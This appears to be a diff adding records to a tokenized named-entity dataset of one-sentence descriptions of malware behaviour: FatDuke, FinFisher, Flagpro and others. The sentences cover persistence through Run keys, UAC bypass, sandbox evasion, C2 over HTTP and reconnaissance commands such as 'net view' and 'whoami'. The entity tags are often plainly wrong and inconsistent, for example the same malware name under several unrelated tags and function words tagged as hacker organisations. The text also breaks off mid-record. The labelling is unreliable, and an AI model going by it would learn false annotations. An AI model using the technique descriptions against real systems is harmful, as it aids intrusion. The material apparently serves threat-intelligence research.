"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "original", + "variant", + "of", + "FakeM", + "encrypts", + "C2", + "traffic", + "using", + "a", + "custom", + "encryption", + "cipher", + "that", + "uses", + "an", + "XOR", + "key", + "of", + "“YHCRA”", + "and", + "bit", + "rotation", + "between", + "each", + "XOR", + "operation.", + "Some", + "variants", + "of", + "FakeM", + "use", + "RC4", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "been", + "packed", + "with", + "junk", + "code", + "and", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "copy", + "files", + "and", + "directories", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "decrypt", + "AES", + "encrypted", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "used", + "several", + "C2", + "servers", + "per", + "targeted", + "organization." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "secure", + "delete", + "its", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "enumerate", + "directories", + "on", + "target", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "used", + "pipes", + "to", + "connect", + "machines", + "with", + "restricted", + "internet", + "access", + "to", + "remote", + "machines", + "via", + "other", + "infected", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "attempted", + "to", + "mimic", + "a", + "compromised", + "user's", + "traffic", + "by", + "using", + "the", + "same", + "user", + "agent", + "as", + "the", + "installed", + "browser." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "call", + "<code>ShellExecuteW</code>", + "to", + "open", + "the", + "default", + "browser", + "on", + "the", + "URL", + "localhost." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "use", + "base64", + "encoding,", + "string", + "stacking,", + "and", + "opaque", + "predicates", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-HackOrg", + "B-Features", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "the", + "ability", + "to", + "execute", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "list", + "running", + "processes", + "on", + "the", + "localhost." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "get", + "user", + "agent", + "strings", + "for", + "the", + "default", + "browser", + "from", + "<code>HKCU\\Software\\Classes\\http\\shell\\open\\command</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "used", + "<code>HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "execute", + "via", + "rundll32." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "has", + "been", + "regularly", + "repacked", + "by", + "its", + "operators", + "to", + "create", + "large", + "binaries", + "and", + "evade", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "AES", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "collect", + "the", + "user", + "name,", + "Windows", + "version,", + "computer", + "name,", + "and", + "available", + "space", + "on", + "discs", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "identify", + "the", + "MAC", + "address", + "on", + "the", + "target", + "computer." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "turn", + "itself", + "on", + "or", + "off", + "at", + "random", + "intervals." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FatDuke", + "can", + "be", + "controlled", + "via", + "a", + "custom", + "C2", + "protocol", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Felismus", + "can", + "download", + "files", + "from", + "remote", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "has", + "masqueraded", + "as", + "legitimate", + "Adobe", + "Content", + "Management", + "System", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "checks", + "for", + "processes", + "associated", + "with", + "anti-virus", + "vendors." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Some", + "Felismus", + "samples", + "use", + "a", + "custom", + "method", + "for", + "C2", + "traffic", + "that", + "utilizes", + "Base64." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Some", + "Felismus", + "samples", + "use", + "a", + "custom", + "encryption", + "method", + "for", + "C2", + "traffic", + "that", + "utilizes", + "AES", + "and", + "multiple", + "keys." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "collects", + "the", + "system", + "information,", + "including", + "hostname", + "and", + "OS", + "version,", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "collects", + "the", + "victim", + "LAN", + "IP", + "address", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "collects", + "the", + "current", + "username", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Felismus", + "uses", + "command", + "line", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "use", + "COM", + "hijacking", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "delete", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "has", + "the", + "ability", + "to", + "add", + "a", + "Class", + "ID", + "in", + "the", + "current", + "user", + "Registry", + "hive", + "to", + "enable", + "persistence", + "mechanisms." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "run", + "<code>GET.WORKSPACE</code>", + "in", + "Microsoft", + "Excel", + "to", + "check", + "if", + "a", + "mouse", + "is", + "present." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "use", + "PowerShell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "has", + "checked", + "for", + "AV", + "software", + "as", + "part", + "of", + "its", + "persistence", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "run", + "anti-sandbox", + "checks", + "using", + "the", + "Microsoft", + "Excel", + "4.0", + "function", + "<code>GET.WORKSPACE</code>", + "to", + "determine", + "the", + "OS", + "version,", + "if", + "there", + "is", + "a", + "mouse", + "present,", + "and", + "if", + "the", + "host", + "is", + "capable", + "of", + "playing", + "sounds." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "can", + "use", + "<code>GET.WORKSPACE</code>", + "in", + "Microsoft", + "Excel", + "to", + "determine", + "the", + "OS", + "version", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ferocious", + "has", + "the", + "ability", + "to", + "use", + "Visual", + "Basic", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Fgdump", + "can", + "dump", + "Windows", + "password", + "hashes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "contains", + "junk", + "code", + "in", + "its", + "functions", + "in", + "an", + "effort", + "to", + "confuse", + "disassembly", + "programs." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Some", + "FinFisher", + "variants", + "incorporate", + "an", + "MBR", + "rootkit." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "performs", + "UAC", + "bypass." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "clears", + "the", + "system", + "event", + "logs", + "using", + "<code>", + "OpenEventLog/ClearEventLog", + "APIs", + "</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "hooks", + "processes", + "by", + "modifying", + "IAT", + "pointers", + "to", + "CreateWindowEx." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "FinFisher", + "variant", + "uses", + "DLL", + "search", + "order", + "hijacking." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "uses", + "DLL", + "side-loading", + "to", + "load", + "malicious", + "programs." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "extracts", + "and", + "decrypts", + "stage", + "3", + "malware,", + "which", + "is", + "stored", + "in", + "encrypted", + "resources." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "injects", + "itself", + "into", + "various", + "processes", + "depending", + "on", + "whether", + "it", + "is", + "low", + "integrity", + "or", + "high", + "integrity." + ], + "ner_tags": [ + "B-Org", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "enumerates", + "directories", + "and", + "scans", + "for", + "certain", + "files." + ], + "ner_tags": [ + "B-Org", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "has", + "used", + "the", + "<code>KernelCallbackTable</code>", + "to", + "hijack", + "the", + "execution", + "flow", + "of", + "a", + "process", + "by", + "replacing", + "the", + "<code>__fnDWORD</code>", + "function", + "with", + "the", + "address", + "of", + "a", + "created", + "Asynchronous", + "Procedure", + "Call", + "stub", + "routine." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "renames", + "one", + "of", + "its", + ".dll", + "files", + "to", + "uxtheme.dll", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "file." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "is", + "heavily", + "obfuscated", + "in", + "many", + "ways,", + "including", + "through", + "the", + "use", + "of", + "spaghetti", + "code", + "in", + "its", + "functions", + "in", + "an", + "effort", + "to", + "confuse", + "disassembly", + "programs.", + "It", + "also", + "uses", + "a", + "custom", + "XOR", + "algorithm", + "to", + "obfuscate", + "code." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "checks", + "its", + "parent", + "process", + "for", + "indications", + "that", + "it", + "is", + "running", + "in", + "a", + "sandbox", + "setup." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "queries", + "Registry", + "values", + "as", + "part", + "of", + "its", + "anti-sandbox", + "checks." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "establishes", + "persistence", + "by", + "creating", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\Run</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FinFisher", + "takes", + "a", + "screenshot", + "of", + "the", + "screen", + "and", + "displays", + "it", + "on", + "top", + "of", + "all", + "other", + "windows", + "for", + "few", + "seconds", + "in", + "an", + "apparent", + "attempt", + "to", + "hide", + "some", + "messages", + "showed", + "by", + "the", + "system", + "during", + "the", + "setup", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "probes", + "the", + "system", + "to", + "check", + "for", + "antimalware", + "processes." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "FinFisher", + "variant", + "uses", + "a", + "custom", + "packer." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "obtains", + "the", + "hardware", + "device", + "list", + "and", + "checks", + "if", + "the", + "MD5", + "of", + "the", + "vendor", + "ID", + "is", + "equal", + "to", + "a", + "predefined", + "list", + "in", + "order", + "to", + "check", + "for", + "sandbox/virtualized", + "environments." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "checks", + "if", + "the", + "victim", + "OS", + "is", + "32", + "or", + "64-bit." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "uses", + "token", + "manipulation", + "with", + "NtFilterToken", + "as", + "part", + "of", + "UAC", + "bypass." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FinFisher", + "creates", + "a", + "new", + "Windows", + "service", + "with", + "the", + "malicious", + "executable", + "for", + "persistence." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "uses", + "Python", + "code", + "to", + "deobfuscate", + "base64-encoded", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "obfuscates", + "strings", + "with", + "base64", + "encoding." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "obtains", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "creates", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "obtains", + "victim", + "Microsoft", + "Windows", + "version", + "information", + "and", + "CPU", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Final1stspy", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "check", + "the", + "name", + "of", + "the", + "window", + "displayed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host,", + "including", + "Windows", + "authentication", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "exfiltrated", + "data", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "close", + "specific", + "Windows", + "Security", + "and", + "Internet", + "Explorer", + "dialog", + "boxes", + "to", + "mask", + "external", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "download", + "additional", + "malware", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "execute", + "the", + "<code>net", + "localgroup", + "administrators</code>", + "command", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "relied", + "on", + "users", + "clicking", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "download", + "malicious", + "files", + "with", + "a", + ".tmp", + "extension", + "and", + "append", + "them", + "with", + ".exe", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "use", + "Native", + "API", + "to", + "enable", + "obfuscation", + "including", + "`GetLastError`", + "and", + "`GetTickCount`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "execute", + "`net", + "view`", + "to", + "discover", + "mapped", + "network", + "shares." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "delivered", + "within", + "ZIP", + "or", + "RAR", + "password-protected", + "archived", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "run", + "the", + "<code>tasklist</code>", + "command", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "dropped", + "an", + "executable", + "file", + "to", + "the", + "startup", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "execute", + "<code>net", + "view</code>", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "the", + "ability", + "to", + "wait", + "for", + "a", + "specified", + "time", + "interval", + "between", + "communicating", + "with", + "and", + "executing", + "commands", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "distributed", + "via", + "spearphishing", + "as", + "an", + "email", + "attachment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "encoded", + "bidirectional", + "data", + "communications", + "between", + "a", + "target", + "system", + "and", + "C2", + "server", + "using", + "Base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "check", + "whether", + "the", + "target", + "system", + "is", + "using", + "Japanese,", + "Taiwanese,", + "or", + "English", + "through", + "detection", + "of", + "specific", + "Windows", + "Security", + "and", + "Internet", + "Explorer", + "dialog." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "execute", + "the", + "<code>ipconfig", + "/all</code>", + "command", + "on", + "a", + "victim", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "execute", + "<code>netstat", + "-ano</code>", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "has", + "been", + "used", + "to", + "run", + "the", + "<code>whoami</code>", + "command", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "execute", + "malicious", + "VBA", + "macros", + "embedded", + "in", + ".xlsm", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "communicate", + "with", + "its", + "C2", + "using", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Flagpro", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "commands", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "can", + "record", + "audio", + "using", + "any", + "existing", + "hardware", + "recording", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "can", + "use", + "Windows", + "Authentication", + "Packages", + "for", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Tool", + "B-Exp", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "has", + "a", + "module", + "named", + "BeetleJuice", + "that", + "contains", + "Bluetooth", + "functionality", + "that", + "may", + "be", + "used", + "in", + "different", + "ways,", + "including", + "transmitting", + "encoded", + "information", + "from", + "the", + "infected", 